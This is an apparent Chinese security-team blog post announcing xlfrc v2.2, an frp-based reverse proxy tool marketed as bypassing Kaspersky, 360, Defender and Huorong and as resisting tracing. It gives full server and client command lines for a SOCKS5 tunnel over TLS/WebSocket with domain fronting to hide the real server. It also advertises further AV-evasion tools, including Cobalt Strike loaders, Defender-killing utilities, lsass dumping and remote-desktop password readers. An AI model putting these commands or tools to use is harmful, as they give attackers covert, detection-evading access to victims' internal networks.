完全分离源码 支持域前置 | 基于frp 过卡巴斯基、360核晶、defender、火绒的xlfrc v2.2发布!

点击上方蓝字关注我们

现在只对常读和星标的公众号才展示大图推送，建议大家能把星落安全团队“设为星标”，否则可能就看不到了啦！

虽然2.1版本xlfrc采用了 EW程序二开而来，而且重新进行了架构新增加了socks密码认证模式，但是frp还是有其自身不可替代的优点，因此进行了彻底的重构，完全分离的客户端与服务端代码，拥有更好的免杀能力，

然后为了提升防溯源能力，取消了原来的读取配置文档模式，改为了纯命令行模式，同时还是配支持域前置功能，一步到位。经过测试到目前为止 可以绕过卡巴斯基、360核晶、defender、火绒等杀软。获取方式:文末纷传获取工具

2.2 版本更新内容：

• frpc去掉-h帮助，执行无输出，需要指定参数运行

  取消配置文件模式，`xlfrc` 与 `xlfrcs` 统一改为纯命令行运行。

• 默认传输启用 TLS 加密。

• 默认使用更适合快速部署的命令行工作流。

• 新增命令行自定义 SOCKS5 用户名和密码功能。

• 支持通过命令行自定义监听端口和连接端口，默认端口为 `7000`。

• 新增域前置相关命令行参数，支持自定义 `connect_server_addr`、`connect_server_port`、`tls_server_name`、`websocket_host`、`websocket_path`。

• 默认 WebSocket 路径已调整为随机 8 位风格路径。

• 客户端与服务端源码已完全拆分，目录结构更清晰，维护更方便。

• 统一客户端、服务端、打包目录与发布文件命名为 `xlfrc` / `xlfrcs`。

• 移除旧的配置管理入口，保留纯命令行作为主要使用方式。

• 精简部分无效或过时模块，优化整体体积与结构。

• 新增完整命令手册，补充常用参数说明和日常使用示例。

  工具使用

xlfrc程序采用内部安全工具箱的方式图形化生成，然后点击打开文件夹即可！

如果想更多的了解工具箱功能，可以参考以下链接：

支持全平台 | 星落安全内部工具箱1.2.1：图形化界面，专业能力触手可及

服务端：按照以下cmd命令启动xlfrcs程序。

xlfrcs.exe --bind_port 7000 --token 12345678

客户端：cmd命令行运行以下命令xlfrc程序，使用–plugin 参数指定协议类型、使用 –server_addr参数指定服务器IP地址。通过以下命令在服务端启动带有的账号密码认证的SOCKS5协议。

xlfrc.exe run --type tcp --plugin socks5 --plugin_user admin --plugin_pwd 123456 --proxy_name whole-net --remote_port 6000 --server_addr 1.2.3.4 --server_port 7000 --token 12345678

服务端:./xlfrcs --bind_port 7000 --token 12345678 --websocket_path /k7m2q9vx客户端:./xlfrc run --protocol wss --server_addr hidden.example.com --server_port 443 --connect_server_addr front.example.com --connect_server_port 443 --tls_server_name front.example.com --websocket_host hidden.example.com --websocket_path /k7m2q9vx --type tcp --plugin socks5 --plugin_user admin --plugin_pwd 123456 --proxy_name whole-net --remote_port 6000 --token 12345678域前置参数含义:--server_addr          逻辑服务端地址--connect_server_addr  实际 TCP 拨号地址--tls_server_name      TLS SNI--websocket_host       WebSocket Host 头--websocket_path       WebSocket 请求路径

因为时间原因，后续我会发布一个WSS 域前置 + SOCKS5方式完整的教程！

免杀测试

卡巴斯基EDR：

360安全卫士：

火绒：

defender：

博主介绍：

目前工作在某安全公司攻防实验室，一线攻击队选手。自2022-2024年总计参加过30+次省/市级攻防演练，擅长工具开发、免杀、代码审计、信息收集、内网渗透等安全技术。

目前已经更新的免杀内容：

• 部分免杀项目源代码

• 星落安全内部免杀工具箱1.2.1

• GoCobaltStrike星落专版2.0

• 一键击溃windows defender

• 一键击溃火绒进程

• CobaltStrike免杀加载器

• 数据库直连工具免杀版

• aspx文件自动上线cobaltbrike

• jsp文件自动上线cobaltbrike

• 哥斯拉免杀工具 XlByPassGodzilla

• 冰蝎免杀工具 XlByPassBehinder

• 冰蝎星落专版 xlbehinder

• 正向代理工具 xleoreg

• 反向代理工具xlfrc

• 内网扫描工具 xlscan

• Todesk/向日葵密码读取工具

• 导出lsass内存工具 xlrls

• 绕过WAF免杀工具 ByPassWAF

• 等等…

往期推荐

1.加量不加价 | 星落免杀第二期，助你打造专属免杀武器库

2.【干货】你不得不学习的内网渗透手法

3.新增全新Web UI版本，操作与管理全面升级 | GoCobalt Strike 2.0正式发布！

4.【免杀】原来SQL注入也可以绕过杀软执行shellcode上线CoblatStrike